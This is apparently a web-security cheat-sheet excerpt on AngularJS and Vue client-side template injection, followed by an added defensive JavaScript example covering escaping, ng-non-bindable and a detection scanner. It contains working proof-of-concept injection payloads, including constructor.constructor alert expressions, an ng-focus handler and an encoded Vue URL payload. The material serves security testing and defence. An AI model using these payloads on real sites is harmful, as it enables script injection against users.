{{ 7-7 }}
If the server is vulnerable you will see a 0, and if not you will see the original: {{ 7-7 }}
ng-app attribute (also known as an AngularJS directive). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces.
For example, if your input is being reflected inside the body of the HTML and the body is defined with ng-app: <body ng-app>, then {{constructor.constructor('alert(1)')()}} or <input ng-focus=$event.view.alert('XSS')> should work.
https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%
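The defensive side of the ng-app case above, as an added example that is not part of the original page: a server-side render that only HTML-escapes the reflected value next to one that also wraps it in ng-non-bindable, plus a heuristic scanner that flags reflected {{ inside an ng-app subtree. All function names are hypothetical, and the scanner covers text-node interpolation only, not event directives such as ng-focus.

```javascript
// Added example (not from the original page). All function names are hypothetical.
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) =>
  ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));

// Weak: HTML-escaping blocks tag injection but leaves {{ }} intact, so the
// reflected value is still compiled as an expression inside ng-app.
const renderWeak = (name) =>
  `<body ng-app><p>Hello ${escapeHtml(name)}</p></body>`;

// Hardened: escape AND wrap in ng-non-bindable, which tells AngularJS not to
// compile the element's contents. Escaping keeps the input from closing the span.
const renderHardened = (name) =>
  `<body ng-app><p>Hello <span ng-non-bindable>${escapeHtml(name)}</span></p></body>`;

const VOID_TAGS = new Set(['input', 'br', 'img', 'meta', 'link', 'hr']);

// Heuristic scanner: returns text runs containing {{ that sit inside an ng-app
// subtree and outside any ng-non-bindable subtree.
function findLiveInterpolation(html) {
  const stack = []; // open elements: { tag, app, off }
  const hits = [];
  const token = /<(\/?)([a-zA-Z][\w-]*)([^>]*)>|([^<]+)/g;
  let m;
  while ((m = token.exec(html)) !== null) {
    const [, closing, rawTag, attrs, text] = m;
    const top = stack[stack.length - 1] || { app: false, off: false };
    if (text !== undefined) {
      if (top.app && !top.off && text.includes('{{')) hits.push(text.trim());
      continue;
    }
    const tag = rawTag.toLowerCase();
    if (closing) {
      const i = stack.map((e) => e.tag).lastIndexOf(tag);
      if (i >= 0) stack.length = i; // pop back to the matching open tag
    } else if (!VOID_TAGS.has(tag) && !attrs.endsWith('/')) {
      stack.push({
        tag,
        app: top.app || /\bng-app\b/.test(attrs),
        off: top.off || /\bng-non-bindable\b/.test(attrs),
      });
    }
  }
  return hits;
}

const probe = '{{ 7-7 }}'; // the page's own arithmetic probe
console.log(findLiveInterpolation(renderWeak(probe)));
console.log(findLiveInterpolation(renderHardened(probe)));
```

The same idea applies to the Vue case in the URL above, where the v-pre directive plays the role of ng-non-bindable.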